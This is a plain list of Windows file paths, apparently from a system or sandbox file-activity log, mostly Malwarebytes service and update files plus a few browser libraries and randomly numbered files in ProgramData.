C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\staging\Global.sr
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktocv0ps.szc.ps1
C:\ProgramData\mozglue.dll
C:\ProgramData\nss3.dll
C:\ProgramData\81476850504792553809184765
C:\ProgramData\39413108715375084465552062
C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\delta1\mbupdatr.exe
C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\delta1\TestDBUpdate.exe
C:\ProgramData\Malwarebytes\MBAMService\dbclsupdate\delta1\mbupdatrV5.exe
C:\ProgramData\47028885019839617543941798
C:\ProgramData\Malwarebytes\MBAMService\mbdigsig2.dat
C:\ProgramData\Malwarebytes\MBAMService\dbmanifest2.dat
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
C:\ProgramData\Malwarebytes\MBAMService\version.dat